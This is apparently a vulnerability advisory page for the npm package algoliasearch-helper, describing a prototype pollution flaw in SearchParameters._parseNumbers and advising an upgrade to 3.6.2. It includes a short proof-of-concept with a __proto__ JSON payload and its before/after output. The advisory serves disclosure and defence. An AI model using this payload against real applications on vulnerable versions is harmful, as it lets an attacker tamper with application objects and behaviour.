algoliasearch-helper@0.0.0-27d41bf vulnerabilities

Helper for implementing advanced search features with algolia

Direct Vulnerabilities

Known vulnerabilities in the algoliasearch-helper package. This does not include vulnerabilities belonging to this package’s dependencies.

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VulnerabilityVulnerable Version
  • M
Prototype Pollution

algoliasearch-helper is a Helper for implementing advanced search features with algolia

Affected versions of this package are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.js#SearchParameters._parseNumbers without any protection against prototype properties.

Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.


// Run npm i algoliasearch-helper, then run the below code
const algohelp = require('algoliasearch-helper')
var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
var test = {};
console.log("Before: " + test.polluted); // Before: undefined
algohelp.SearchParameters._parseNumbers(payload); // {}
console.log("After: " + test.polluted); // After: vulnerable to PP

How to fix Prototype Pollution?

Upgrade algoliasearch-helper to version 3.6.2 or higher.
